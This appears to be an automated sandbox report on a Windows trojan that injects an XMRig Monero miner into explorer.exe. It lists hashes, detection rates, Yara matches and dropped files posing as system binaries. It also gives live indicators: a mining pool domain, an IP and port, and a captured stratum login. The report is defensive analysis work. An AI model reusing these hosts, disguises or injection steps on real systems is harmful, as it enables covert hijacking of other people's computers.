Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name: pcNCraWcRk (renamed file extension from none to exe)
Analysis ID: 513056
MD5: 0958fa69ba0e6645c42215c5325d8f76
SHA1: 800666827e118ce78aef55c47864512ef9d3b7a6
SHA256: 1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags: exetrojan
Infos:

Most interesting Screenshot:

Detection

BitCoin Miner Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: pcNCraWcRk.exe Virustotal: Detection: 64% Perma Link
Source: pcNCraWcRk.exe Metadefender: Detection: 31% Perma Link
Source: pcNCraWcRk.exe ReversingLabs: Detection: 81%
Antivirus / Scanner detection for submitted sample
Source: pcNCraWcRk.exe Avira: detected
Multi AV Scanner detection for domain / URL
Source: xmr.givemexyz.in Virustotal: Detection: 15% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: TR/Agent.ywcqa
Source: C:\Users\user\AppData\Local\Temp\services64.exe Avira: detection malicious, Label: TR/Agent.wbqui
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\services64.exe Virustotal: Detection: 64% Perma Link
Source: C:\Users\user\AppData\Local\Temp\services64.exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Temp\services64.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Metadefender: Detection: 48% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe ReversingLabs: Detection: 82%

Bitcoin Miner:

barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp String found in binary or memory: FileDescriptionXMRig miner.
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.23.214.117 144 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: xmr.givemexyz.in
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000001.00000002.685200138.0000025F60DC1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, explorer.exe, 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, explorer.exe, 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown DNS traffic detected: queries for: xmr.givemexyz.in

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Yara signature match
Source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
